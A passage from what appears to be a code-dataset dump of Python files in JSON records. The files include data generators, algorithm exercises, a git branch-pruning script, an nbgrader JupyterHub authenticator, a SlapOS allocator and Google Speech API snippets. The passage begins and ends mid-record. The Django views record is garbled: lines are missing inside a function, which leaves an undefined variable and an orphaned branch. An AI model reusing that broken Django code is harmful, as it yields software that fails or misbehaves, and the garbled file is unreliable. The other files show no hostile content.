'QUA', 'QUI', 'SEX', 'SAB', 'DOM']\ndia_sem = []\nfor i2 in range(qt_loops):\n    dia_sem.append(dia[rd.randint(0, len(dia) - 1)])\n\ndict_categ = []\nfor i3 in range(qt_loops):\n    dict_categ.append(Categoria[rd.randint(0, len(Categoria) - 1)])\n\ndict_ID = []\nfor i4 in range(qt_loops):\n    dict_ID.append(ID[rd.randint(0, len(ID) - 1)])\n\ndict_Data = []\nfor i5 in range(qt_loops):\n    dict_Data.append(Data[rd.randint(0, len(Data) - 1)])\n\ndict_Hora = []\nfor i6 in range(qt_loops):\n    dict_Hora.append(Hora[rd.randint(0, len(Hora) - 1)])\n\ndict_Turno = []\nfor i8 in range(qt_loops):\n    dict_Turno.append(Turno[rd.randint(0, len(Turno) - 1)])\n\ntituto = ['abc', 'def', 'ghi', 'jlm']\ndict_titulo = []\nfor i9 in range(qt_loops):\n    dict_titulo.append(tituto[rd.randint(0, len(tituto) - 1)])\n\nProduto = ['MultiCard', 'Class', 'Unique', 'Elite', 'Alfa']\ndict_Produto = []\nfor i10 in range(qt_loops):\n    dict_Produto.append(Produto[rd.randint(0, len(Produto) - 1)])\n\ndict_Qtde = []\nfor i11 in range(qt_loops):\n    dict_Qtde.append(rd.randint(0, 500))\n\ndict_status = []\nfor i12 in range(qt_loops):\n    dict_status.append(status[rd.randint(0, len(status) - 1)])\n\ndict_Item = []\nfor i13 in range(qt_loops):\n    dict_Item.append(Item[rd.randint(0, len(Item) - 1)])\n\n\ndict = {'item': dict_Item, 'linha': dict_linha, 'categoria': dict_categ, 'id': dict_ID, 'auditor': dict_audit,\n        'data': dict_Data, 'dia_sem': dia_sem, 'hora_i': dict_Hora, 'hora_f': dict_Hora, 'turno': dict_Turno, 'produto': dict_Produto,\n        'qtde_lote': dict_Qtde, 'qtde': dict_Qtde, 'titulo': dict_titulo, 'descri': dict_titulo, 'status': dict_status}\n\ndt = pd.DataFrame(dict)\n#set caminho to the destination path where the file will be saved.\ncaminho = 'c:/dados.csv'\ndt.to_csv(caminho, 
index=False)\n","sub_path":"RandDataFrame.py","file_name":"RandDataFrame.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"360607228","text":"import sys, string, math\r\n\r\n# A naive Python implementation of the LIS problem\r\n\r\n# global variable to store the maximum\r\nglobal maximum\r\n\r\ndef lis2(arr, n):\r\n    # to allow the access of global variable\r\n    global maximum\r\n\r\n    if n == 1: return 1\r\n\r\n    maxEndingHere = 1\r\n\r\n    for i in range(1, n):\r\n        res = lis2(arr, i)\r\n        if arr[i - 1] < arr[n - 1] and res + 1 > maxEndingHere:\r\n            maxEndingHere = res + 1\r\n        maximum = max(maximum, maxEndingHere)\r\n    return maxEndingHere\r\n\r\ndef lis(arr):\r\n    # to allow the access of global variable\r\n    global maximum\r\n    n = len(arr)\r\n    maximum = 1\r\n    lis2(arr, n)\r\n    return maximum\r\n\r\n\r\n# Driver program to test the above function\r\nn = int(input())\r\nL = [ int(x) for x in input().split()]\r\nprint(lis(L))\r\n","sub_path":"Level-4/s03/guvi-L4-s03-py06.py","file_name":"guvi-L4-s03-py06.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"93400049","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n# class presa():\n#     def __init__(self,tsc)\n\ndef add_vertex(G,presas,depredadores):\n    G.add_nodes_from([presas[i] for i in range(len(presas))])\n    G.add_nodes_from([depredadores[i] for i in range(len(depredadores))])\ndef add_edges(G,aristas):\n    G.add_edges_from([i for i in aristas])\nG=nx.Graph()\nadd_vertex(G,[x for x in range(7)],[y for y in range(7,16)])\nadd_edges(G,[(7,6),(8,9),(6,5),(5,9),(8,7),(2,7),(1,6),(0,5),(4,9),(3,8),(13,2),(13,3),(14,3),(15,4),(10,0),(11,1),(12,2)])\n#G.add_edge(1,2)\nl=G.number_of_nodes()\ns=G.number_of_edges()\nprint(l)\nprint(list(G.nodes))\nprint(s)\nprint(G.edges)\noptions = {\n    'node_color': [\"red\",\"lightblue\"],\n    'node_size': 150,\n    'width': 1,\n}\n\n\nplt.subplot(111)\n\n#nx.draw_spectral(G, **options,with_labels=False, font_weight='bold')\nnx.draw_shell(G,nlist=[range(5,10),range(5), range(10,16)],with_labels=True, font_weight='bold')\n#nx.draw_circular(G, **options,with_labels=False, font_weight='bold')\n#nx.draw_random(G, **options,with_labels=False, font_weight='bold')\nplt.savefig(\"grafoEjemplo.PNG\")\nplt.show()\n","sub_path":"tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"377211658","text":"# -*- coding: utf-8 -*-\nimport random\n\n# Function used to automate the assignment; it takes a list of users in addition to the dict of servers\n# \ndef serveur_plusieur_utilisateur(dicto_serveur,liste_utilisateur):\n    # create a dict whose keys are the servers\n    dico_utilisateur={}\n    for serveur in dicto_serveur:\n        dico_utilisateur[serveur]=list()\n\n    # For every user, request a server, and add the user to the server dict as a value\n    for utilisateur in liste_utilisateur:\n        serv=choix_serveur(dicto_serveur)\n        dicto_serveur[serv]=dicto_serveur[serv]+1\n        dico_utilisateur[serv].append(utilisateur)\n    return dico_utilisateur\n\n# Function used to fetch a single server when adding a single VM\ndef serveur_un_utilisateur(dicto_serveur):\n    return choix_serveur(dicto_serveur)\n\n# Function that returns the server to assign: the least populated server, or a random pick if several are tied\ndef choix_serveur(dicto_serveur):\n    values=list(dicto_serveur.values())\n    keys = list(dicto_serveur.keys())\n    mini=min(values)\n    # if several servers have the minimum number of VMs on them\n    if values.count(mini)>1:\n        # Take a random number between 0 and the number of minimum-loaded machines - 1\n        r=random.randint(0, values.count(mini)-1)\n        l=[]\n        # Build the list of those machines\n        for v in range(0,len(values)):\n            if values[v]==mini:\n                l.append(keys[v])\n            v+=1\n        # Return the machine picked from the list using the random number\n        return l[r]\n    # If only one server has fewer VMs than the others, return it\n    else:\n        i=values.index(mini)\n        return keys[i]\n    \n\n\n# listetudiant = [\"adrian\",\"maxime\",\"listetrim1\",\"oui\",\"x\",\"y\"]\n# dictserver = {\"serveur1\":6,\"serveur2\":5,\"serveur3\":6}\n# print(serveur_plusieur_utilisateur(dictserver,listetudiant))\n# print(choix_serveur(dictserver))\n","sub_path":"code/scripts/repartition.py","file_name":"repartition.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"419215857","text":"from django.shortcuts import render, HttpResponse, HttpResponseRedirect, redirect\nfrom . import modelControler as mc\nimport json\n\n# Create your views here.\n\n\n# Top page\ndef index(request):\n    login = False\n    player_name = \" \"\n    error = False\n    room_list = {}\n    try:\n        if \"player_name\" in request.session:\n            player_name = mc.getPlayer(request.session[\"player_name\"])[\"name\"]\n            login = True\n            room_list = mc.getAllRoom()\n        if \"player_name\" in request.POST:\n            try:\n                mc.createPlayer(request.POST[\"player_name\"])\n                login = True\n                request.session[\"player_name\"] = request.POST[\"player_name\"]\n                player_name = request.POST[\"player_name\"]\n                room_list = mc.getAllRoom()\n            except:\n                error = True\n        if \"logout\" in request.POST:\n            login = False\n            mc.destroyPlayer(request.session[\"player_name\"])\n            player_name = \" \"\n            del request.session[\"player_name\"]\n    except:\n        if \"player_name\" in request.session:\n            del request.session[\"player_name\"]\n        login = False\n        player_name = \" \"\n        error = False\n\n    return render(request, \"app/index.html\", {\"login\": login, \"player_name\": player_name, \"error\": error, \"room_list\": room_list})\n\n\n# Room screen\ndef room(request):\n    try:\n        player_name = mc.getPlayer(request.session[\"player_name\"])[\"name\"]\n        room_name = 
mc.getRoom(request.POST[\"room_name\"])[\"id\"]\n mc.setRoomId(request.session[\"player_name\"], room_id)\n return HttpResponse(\"true\")\n except:\n return HttpResponseRedirect(\"/\")\n elif func == \"get_room_id\":\n room_id = mc.getRoom(request.session[\"room_name\"])[\"id\"]\n return HttpResponse(room_id)\n elif func == \"get_player_list\":\n room_id = request.POST[\"room_id\"]\n players = list(mc.getAllPlayer().filter(room_id=room_id))\n return HttpResponse(json.dumps(players, ensure_ascii=False))\n elif func == \"exit_room\":\n mc.setRoomId(request.session[\"player_name\"], None)\n if \"room_name\" in request.session:\n mc.setRoomNum(request.session[\"room_name\"])\n del request.session[\"room_name\"]\n return HttpResponseRedirect(\"/\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160633109","text":"\"\"\"\n2019\n\nChapter 7 Exercises\n\nLoops\n\n\"\"\"\n\n#Q1 print a list\nli = [\"The Walking Dead\",\n \"Entourage\",\n \"The Sopranos\",\n \"The Vampire Diaries\"]\n\nfor show in li:\n print(show)\n\n#Q2 Print all numbers between 25-50\nx = 25\nwhile x <= 50:\n print(x)\n x += 1\n\n#Q3 Print items and indexes from Q1\nfor obj in li:\n print(li.index(obj), obj)\n\n#Q4 List guessing game \nnumbers = [11, 32, 33, 15, 1]\n\nwhile True:\n answer = input(\"Guess a number or type q to quit.\")\n if answer == \"q\":\n break\n try:\n answer = int(answer)\n except ValueError:\n print(\"please type a number or q to quit.\")\n if answer in numbers:\n print(\"You guessed correctly!\")\n else:\n print(\"You guessed incorrectly!\")\n \n\n#Q5 Multiply nested loops \nlist1 = [8, 19, 148, 4]\nlist2 = [9, 1, 33, 83]\nlist3 = []\n\nfor i in list1:\n for j in list2:\n mult = i * j\n list3.append(i * j)\n\nprint(list3)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Chapter7.py","file_name":"Chapter7.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390224625","text":"#!/usr/bin/env python3\nimport argparse\nimport json\nimport os.path\nimport subprocess\n\nHERE = os.path.dirname(os.path.realpath(__file__))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dry-run', action='store_true')\n parser.add_argument('--remote', default='')\n parser.add_argument('--upstream', default='')\n args = parser.parse_args()\n\n cmd = (\n os.path.join(HERE, '_git-remote-upstream'),\n '--remote', args.remote, '--upstream', args.upstream,\n )\n remote, upstream = json.loads(subprocess.check_output(cmd))\n\n if args.dry_run:\n dry_run = 'echo '\n else:\n dry_run = ''\n\n subprocess.check_call((\n 'bash', '-c',\n f'git fetch --all --prune && '\n f'git branch --remote --merged {upstream}/master | '\n f'grep {remote}/ | '\n f\"cut -d'/' -f2-999 | \"\n f\"grep -Ev '^(PLACEHOLDER|master|stage|production)' | \"\n f\"grep -v '>' | \"\n f\"xargs --replace -P 8 {dry_run}git push {remote} :{{}}\",\n ))\n subprocess.check_call((\n 'bash', '-c',\n fr'git branch --merged {upstream}/master | '\n fr\"grep -Ev '(\\*|master)' | \"\n fr'xargs --no-run-if-empty {dry_run}git branch --delete',\n ))\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"python/prune-remote-branches.py","file_name":"prune-remote-branches.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
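A minimal usage sketch for the branch-pruning script in the record above. The flag names come from its argparse definitions; the remote and upstream names below are illustrative assumptions, since the empty-string defaults are resolved by the companion `_git-remote-upstream` helper, which is not shown here:
    # Hypothetical invocations (not part of the dataset):
    #   python prune-remote-branches.py --dry-run
    #   python prune-remote-branches.py --remote origin --upstream upstream
    # With --dry-run the script prefixes each `git push` / `git branch --delete`
    # command with `echo`, so merged branches are only listed, never deleted.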
+{"seq_id":"342039164","text":"import gym\nimport numpy as np\nfrom collections import deque\nfrom keras.models import load_model\nfrom atari_wrappers import wrap_deepmind\nimport time\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('env_name', type=str)\n parser.add_argument('model_name', type=str)\n parser.add_argument('--hist_len', type=int, default=4)\n parser.add_argument('--num_episodes', type=int, default=10)\n args = parser.parse_args()\n\n model = load_model(args.model_name)\n env = gym.make(args.env_name)\n env = wrap_deepmind(env)\n\n for i in range(args.num_episodes):\n obs = env.reset()\n obs_hist = deque([obs] * args.hist_len, maxlen=args.hist_len)\n done = False\n while not done:\n obs_input = np.concatenate(obs_hist, axis=2)\n action = model.predict(obs_input[np.newaxis])\n action = np.argmax(action[0])\n\n obs, reward, done, _ = env.step(action)\n env.render()\n obs_hist.append(obs)\n\n time.sleep(0.5)\n","sub_path":"hw3/play_atari.py","file_name":"play_atari.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"586524990","text":"\"\"\"JupyterHub authenticator.\"\"\"\nimport requests\nimport os\nimport json\nimport sys\n\nfrom subprocess import check_output\nfrom traitlets import Unicode, Int, List, Bool, Instance\nfrom six.moves.urllib.parse import unquote\nfrom tornado import web\n\ntry:\n from jupyterhub.services.auth import HubAuth as JupyterHubAuth\n JupyterHubAuth.__name__ = \"JupyterHubAuth\"\nexcept ImportError:\n JupyterHubAuth = None\n\nfrom .base import BaseAuth\n\n\nclass HubAuth(BaseAuth):\n \"\"\"Jupyter hub authenticator.\"\"\"\n\n graders = List([], config=True, help=\"List of JupyterHub user names allowed to grade.\")\n\n if JupyterHubAuth:\n hub_authenticator = Instance(JupyterHubAuth)\n else:\n hub_authenticator = None\n\n def _hub_authenticator_default(self):\n auth = JupyterHubAuth(parent=self)\n auth.login_url = '/hub/login'\n auth.api_url = '{}/hub/api'.format(self.hubapi_base_url)\n auth.api_token = self.hubapi_token\n auth.cookie_name = self.hubapi_cookie\n return auth\n\n hub_base_url = Unicode(config=True, help=\"Base URL of the hub server.\")\n def _hub_base_url_default(self):\n return 'http://{}:8000'.format(self._ip)\n\n hubapi_base_url = Unicode(config=True, help=\"Base URL of the hub server.\")\n def _hubapi_base_url_default(self):\n return 'http://{}:8081'.format(self._ip)\n def _hubapi_base_url_changed(self, name, old, new):\n if self.hub_authenticator:\n self.hub_authenticator.api_url = '{}/hub/api'.format(new)\n\n hubapi_token = Unicode(config=True, help=\"\"\"JupyterHub API auth token. \n Generated by running `jupyterhub token`. 
If not explicitly set,\n    nbgrader will use $JPY_API_TOKEN as the API token.\"\"\")\n    def _hubapi_token_default(self):\n        return os.environ.get('JPY_API_TOKEN', '')\n    def _hubapi_token_changed(self, name, old, new):\n        if self.hub_authenticator:\n            self.hub_authenticator.api_token = new\n\n    hubapi_cookie = Unicode(\"jupyter-hub-token\", config=True, help=\"Name of the cookie used by JupyterHub\")\n    def _hubapi_cookie_changed(self, name, old, new):\n        if self.hub_authenticator:\n            self.hub_authenticator.cookie_name = new\n\n    proxy_base_url = Unicode(config=True, help=\"Base URL of the configurable-http-proxy server.\")\n    def _proxy_base_url_default(self):\n        return 'http://{}:8001'.format(self._ip)\n\n    proxy_token = Unicode(config=True, help=\"\"\"JupyterHub configurable proxy \n    auth token. If not explicitly set, nbgrader will use \n    $CONFIGPROXY_AUTH_TOKEN as the API token.\"\"\")\n    def _proxy_token_default(self):\n        return os.environ.get('CONFIGPROXY_AUTH_TOKEN', '')\n\n    notebook_url_prefix = Unicode(None, config=True, allow_none=True, help=\"\"\"\n    Relative path of the formgrader with respect to the hub's user base\n    directory. No trailing slash. i.e. \"Documents\" or \"Documents/notebooks\". \"\"\")\n    def _notebook_url_prefix_changed(self, name, old, new):\n        self.notebook_url_prefix = new.strip('/')\n\n    remap_url = Unicode(config=True, help=\"\"\"Suffix appended to \n    `HubAuth.hub_base_url` to form the full URL to the formgrade server. By\n    default this is '/hub/{NbGrader.course_id}'. Change this if you\n    plan on running more than one formgrade server behind one JupyterHub\n    instance.\"\"\")\n    def _remap_url_default(self):\n        return '/hub/nbgrader/' + self.parent.course_id\n    def _remap_url_changed(self, name, old, new):\n        self.remap_url = new.rstrip('/')\n\n    connect_ip = Unicode('', config=True, help=\"\"\"The formgrader ip address that\n    JupyterHub should actually connect to. Useful for when the formgrader is\n    running behind a proxy or inside a container.\"\"\")\n\n    notebook_server_user = Unicode('', config=True, help=\"\"\"The user that hosts\n    the autograded notebooks. 
By default, this is just the user that is logged\n in, but if that user is an admin user and has the ability to access other\n users' servers, then this variable can be set, allowing them to access\n the notebook server with the autograded notebooks.\"\"\")\n\n def _config_changed(self, name, old, new):\n if 'proxy_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.proxy_address is no longer a valid configuration \"\n \"option, please use HubAuth.proxy_base_url instead.\"\n )\n\n if 'proxy_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.proxy_port is no longer a valid configuration \"\n \"option, please use HubAuth.proxy_base_url instead.\"\n )\n\n if 'hub_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hub_address is no longer a valid configuration \"\n \"option, please use HubAuth.hub_base_url instead.\"\n )\n\n if 'hub_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hub_port is no longer a valid configuration \"\n \"option, please use HubAuth.hub_base_url instead.\"\n )\n\n if 'hubapi_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hubapi_address is no longer a valid configuration \"\n \"option, please use HubAuth.hubapi_base_url instead.\"\n )\n\n if 'hubapi_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hubapi_port is no longer a valid configuration \"\n \"option, please use HubAuth.hubapi_base_url instead.\"\n )\n\n super(HubAuth, self)._config_changed(name, old, new)\n\n def __init__(self, *args, **kwargs):\n super(HubAuth, self).__init__(*args, **kwargs)\n self._base_url = self.hub_base_url + self.remap_url\n self.register_with_proxy()\n\n @property\n def login_url(self):\n return self.hub_authenticator.login_url\n\n def register_with_proxy(self):\n # Register self as a route of the configurable-http-proxy and then\n # update the base_url to point to the new path.\n if self.connect_ip:\n ip = self.connect_ip\n else:\n ip = self._ip\n target = 'http://{}:{}'.format(ip, self._port)\n self.log.info(\"Proxying {} --> {}\".format(self.remap_url, target))\n response = self._proxy_request('/api/routes' + self.remap_url, method='POST', body={\n 'target': target\n })\n # This error will occur, for example, if the CONFIGPROXY_AUTH_TOKEN is\n # incorrect.\n if response.status_code != 201:\n raise Exception('Error while trying to add JupyterHub route. {}: {}'.format(response.status_code, response.text))\n\n def add_remap_url_prefix(self, url):\n if url == '/':\n return self.remap_url + '/?'\n else:\n return self.remap_url + url\n\n def transform_handler(self, handler):\n new_handler = list(handler)\n\n # transform the handler url\n url = self.add_remap_url_prefix(handler[0])\n new_handler[0] = url\n\n # transform any urls in the arguments\n if len(handler) > 2:\n new_args = handler[2].copy()\n if 'url' in new_args:\n new_args['url'] = self.add_remap_url_prefix(new_args['url'])\n new_handler[2] = new_args\n\n return tuple(new_handler)\n\n def get_user(self, handler):\n user_model = self.hub_authenticator.get_user(handler)\n if user_model:\n return user_model['name']\n return None\n\n def authenticate(self, user):\n \"\"\"Authenticate a request.\n Returns a boolean or redirect.\"\"\"\n\n # Check if the user name is registered as a grader.\n if user in self.graders:\n self._user = user\n return True\n\n self.log.warn('Unauthorized user \"%s\" attempted to access the formgrader.' 
% user)\n return False\n\n def notebook_server_exists(self):\n \"\"\"Does the notebook server exist?\"\"\"\n if self.notebook_server_user:\n user = self.notebook_server_user\n else:\n user = self._user\n\n # first check if the server is running\n response = self._hubapi_request('/hub/api/users/{}'.format(user))\n if response.status_code == 200:\n user_data = response.json()\n else:\n self.log.warn(\"Could not access information about user {} (response: {} {})\".format(\n user, response.status_code, response.reason))\n return False\n\n # start it if it's not running\n if user_data['server'] is None and user_data['pending'] != 'spawn':\n # start the server\n response = self._hubapi_request('/hub/api/users/{}/server'.format(user), method='POST')\n if response.status_code not in (201, 202):\n self.log.warn(\"Could not start server for user {} (response: {} {})\".format(\n user, response.status_code, response.reason))\n return False\n\n return True\n\n def get_notebook_server_cookie(self):\n # same user, so no need to request admin access\n if not self.notebook_server_user:\n return None\n\n # request admin access to the user's server\n response = self._hubapi_request('/hub/api/users/{}/admin-access'.format(self.notebook_server_user), method='POST')\n if response.status_code != 200:\n self.log.warn(\"Failed to gain admin access to user {}'s server (response: {} {})\".format(\n self.notebook_server_user, response.status_code, response.reason))\n return None\n\n # access granted!\n cookie_name = '{}-{}'.format(self.hubapi_cookie, self.notebook_server_user)\n notebook_server_cookie = unquote(response.cookies[cookie_name][1:-1])\n cookie = {\n 'name': cookie_name,\n 'value': notebook_server_cookie,\n 'path': '/user/{}'.format(self.notebook_server_user)\n }\n\n return cookie\n\n def get_notebook_url(self, relative_path):\n \"\"\"Gets the notebook's url.\"\"\"\n if self.notebook_url_prefix is not None:\n relative_path = self.notebook_url_prefix + '/' + relative_path\n if self.notebook_server_user:\n user = self.notebook_server_user\n else:\n user = self._user\n return \"{}/user/{}/notebooks/{}\".format(self.hub_base_url, user, relative_path)\n\n def _hubapi_request(self, *args, **kwargs):\n return self._request('hubapi', *args, **kwargs)\n\n def _proxy_request(self, *args, **kwargs):\n return self._request('proxy', *args, **kwargs)\n\n def _request(self, service, relative_path, method='GET', body=None):\n base_url = getattr(self, '%s_base_url' % service)\n token = getattr(self, '%s_token' % service)\n\n data = body\n if isinstance(data, (dict,)):\n data = json.dumps(data)\n\n return requests.request(method, base_url + relative_path, headers={\n 'Authorization': 'token %s' % token\n }, data=data)\n","sub_path":"nbgrader/auth/hubauth.py","file_name":"hubauth.py","file_ext":"py","file_size_in_byte":11061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515068504","text":"import random\nfrom Products.ZSQLCatalog.SQLCatalog import SimpleQuery, ComplexQuery\nperson = context\n\ncomputer_partition = None\nquery_kw = {\n 'software_release_url': software_release_url,\n 'portal_type': 'Computer Partition',\n}\nif software_instance_portal_type == \"Slave Instance\":\n query_kw['free_for_request'] = 0\n query_kw['software_type'] = software_type\nelif software_instance_portal_type == \"Software Instance\":\n query_kw['free_for_request'] = 1\nelse:\n raise NotImplementedError(\"Unknown portal type %s\"%\n software_instance_portal_type)\n\n# support SLA\n\n# 
Explicit location\nexplicit_location = False\nif \"computer_guid\" in filter_kw:\n explicit_location = True\n query_kw[\"parent_reference\"] = SimpleQuery(parent_reference=filter_kw.pop(\"computer_guid\"))\n\nif \"instance_guid\" in filter_kw:\n explicit_location = True\n portal = context.getPortalObject()\n instance_guid = filter_kw.pop(\"instance_guid\")\n query_kw[\"aggregate_related_reference\"] = SimpleQuery(aggregate_related_reference=instance_guid)\n\nif 'network_guid' in filter_kw:\n network_guid = filter_kw.pop('network_guid')\n query_kw[\"default_subordination_reference\"] = SimpleQuery(default_subordination_reference=network_guid)\n\nif computer_network_query:\n if query_kw.get(\"default_subordination_reference\"):\n query_kw[\"default_subordination_reference\"] = ComplexQuery(\n query_kw[\"default_subordination_reference\"],\n computer_network_query\n )\n else:\n query_kw[\"default_subordination_reference\"] = computer_network_query\n\nif \"retention_delay\" in filter_kw:\n filter_kw.pop(\"retention_delay\")\n\ncomputer_base_category_list = [\n 'group',\n 'cpu_core',\n 'cpu_frequency',\n 'cpu_type',\n 'local_area_network_type',\n 'region',\n 'memory_size',\n 'memory_type',\n 'storage_capacity',\n 'storage_interface',\n 'storage_redundancy',\n]\nfor base_category in computer_base_category_list:\n if base_category in filter_kw:\n category_relative_url = \"%s\" % filter_kw.pop(base_category)\n # XXX Small protection to prevent entering strange strings\n category = context.getPortalObject().portal_categories[base_category].restrictedTraverse(str(category_relative_url), None)\n if category is None:\n query_kw[\"uid\"] = \"-1\"\n else:\n query_kw[\"%s_uid\" % base_category] = category.getUid()\n\nquery_kw[\"capacity_scope_uid\"] = context.getPortalObject().portal_categories.capacity_scope.open.getUid()\n# if not explicit_location:\n# # Only allocation on public computer\n# query_kw[\"allocation_scope_uid\"] = context.getPortalObject().portal_categories.allocation_scope.open.public.getUid()\n\nif filter_kw.keys():\n # XXX Drop all unexpected keys\n query_kw[\"uid\"] = \"-1\"\n\nif test_mode:\n return bool(len(context.portal_catalog(limit=1, **query_kw)))\n\n# Get only one computer_partition per computer\ncomputer_partition_list = context.portal_catalog(group_by=\"parent_uid\", **query_kw)\n\nsoftware_release_list = context.portal_catalog(\n portal_type=\"Software Release\",\n url_string=software_release_url\n) \n\nif len(software_release_list) == 0:\n # Forbid to allocate partitions without an existing Software Release Document.\n raise KeyError(len(software_release_list))\n\ndelta_co2_contribution_list = software_release_list[0].SoftwareRelease_getDeltaCO2List(computer_partition_list)\n\nisTransitionPossible = context.getPortalObject().portal_workflow.isTransitionPossible\n\nwhile len(delta_co2_contribution_list):\n partition_candidate_list = delta_co2_contribution_list.pop(min(delta_co2_contribution_list))\n\n for computer_partition_candidate in partition_candidate_list:\n computer_partition_candidate = computer_partition_candidate.getObject()\n if software_instance_portal_type == \"Software Instance\":\n # Check if the computer partition can be marked as busy\n if isTransitionPossible(computer_partition_candidate, 'mark_busy'):\n computer_partition = computer_partition_candidate\n computer_partition.markBusy()\n break\n elif computer_partition_candidate.getSlapState() == \"busy\":\n # Only assign slave instance on busy partition\n computer_partition = computer_partition_candidate\n 
break\n\nif computer_partition is None:\n  raise ValueError('It was not possible to find a free Computer Partition')\n\n# lock computer partition\ncomputer_partition.serialize()\n\nreturn computer_partition.getRelativeUrl()\n","sub_path":"master/bt5/slapos_ecoallocation/SkinTemplateItem/portal_skins/slapos_ecoallocation/Person_findPartitionEcoAllocation.py","file_name":"Person_findPartitionEcoAllocation.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"14518706","text":"#!/usr/bin/env python\n\n# Copyright 2018 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Google Cloud Speech API sample that demonstrates enhanced models\nand recognition metadata.\nExample usage:\n    python beta_snippets.py enhanced-model\n    python beta_snippets.py metadata\n    python beta_snippets.py punctuation\n    python beta_snippets.py diarization\n    python beta_snippets.py multi-channel\n    python beta_snippets.py multi-language\n    python beta_snippets.py word-level-conf\n\"\"\"\n\nimport argparse\nimport io\nfrom google.cloud import speech_v1p1beta1 as speech\n\ndef transcribe_gcs_with_metadata_return(gcs_uri, # storage uri\n                                        sample_rate_hertzs, # sample rate in hertz\n                                        interactionTypes, # audio use case\n                                        industryNaicsCodeOfAudios, # industry category of the audio\n                                        microphoneDistances, # distance from the speaker to the microphone\n                                        originalMediaTypes, # whether the original media is audio or video\n                                        recordingDeviceTypes): # type of device that captured the audio\n    \"\"\"Send a request that includes recognition metadata.\"\"\"\n    # [START speech_transcribe_recognition_metadata_beta]\n\n    print('gcs_uri : ', gcs_uri)\n    client = speech.SpeechClient()\n    audio = speech.types.RecognitionAudio(uri=gcs_uri)\n\n    # Here we construct a recognition metadata object.\n    # Most metadata fields are specified as enums that can be found\n    # in speech.enums.RecognitionMetadata\n    metadata = speech.types.RecognitionMetadata()\n    metadata.interaction_type = interactionTypes\n    # And some are integers, for instance the 6 digit NAICS code\n    # https://www.naics.com/search/\n    metadata.industry_naics_code_of_audio = industryNaicsCodeOfAudios #default : 519190\n    metadata.recording_device_type = recordingDeviceTypes\n    metadata.microphone_distance = microphoneDistances\n    #append meta start\n    #append meta end\n    # Some metadata fields are free form strings\n    metadata.recording_device_name = \"Pixel 2 XL\"\n\n\n    config = speech.types.RecognitionConfig(\n        encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n        sample_rate_hertz=sample_rate_hertzs,\n        language_code='ko-KR',\n        # Add this in the request to send metadata.\n        metadata=metadata)\n\n    operation = client.long_running_recognize(config, audio)\n\n    print('Waiting for operation to complete...')\n    response = operation.result(timeout=90)\n\n    tuple_result_msg = ()\n    result_msg = ''\n    confidence = 0\n    for i, result in enumerate(response.results):\n        alternative = result.alternatives[0]\n        print('-' * 20)\n        print('First alternative of result {}'.format(i))\n        print('Transcript: 
{}'.format(alternative.transcript))\n        print('confidence: {}'.format(alternative.confidence))\n        result_msg += result.alternatives[0].transcript + ' '\n        confidence += result.alternatives[0].confidence\n\n    # return the result so it can be saved to BigQuery\n    tuple_result_msg = (result_msg, confidence / len(response.results))\n    return tuple_result_msg\n    # [END speech_transcribe_recognition_metadata_beta]\n\n\ndef transcribe_gcs_with_metadata(gcs_uri):\n    \"\"\"Send a request that includes recognition metadata.\"\"\"\n    # [START speech_transcribe_recognition_metadata_beta]\n\n    print('gcs_uri : ', gcs_uri)\n    client = speech.SpeechClient()\n    audio = speech.types.RecognitionAudio(uri=gcs_uri)\n\n    # Here we construct a recognition metadata object.\n    # Most metadata fields are specified as enums that can be found\n    # in speech.enums.RecognitionMetadata\n    metadata = speech.types.RecognitionMetadata()\n    metadata.interaction_type = (\n        speech.enums.RecognitionMetadata.InteractionType.DISCUSSION)\n    metadata.microphone_distance = (\n        speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD)\n    metadata.recording_device_type = (\n        speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE)\n    # Some metadata fields are free form strings\n    metadata.recording_device_name = \"Pixel 2 XL\"\n    # And some are integers, for instance the 6 digit NAICS code\n    # https://www.naics.com/search/\n    metadata.industry_naics_code_of_audio = 519190\n\n    config = 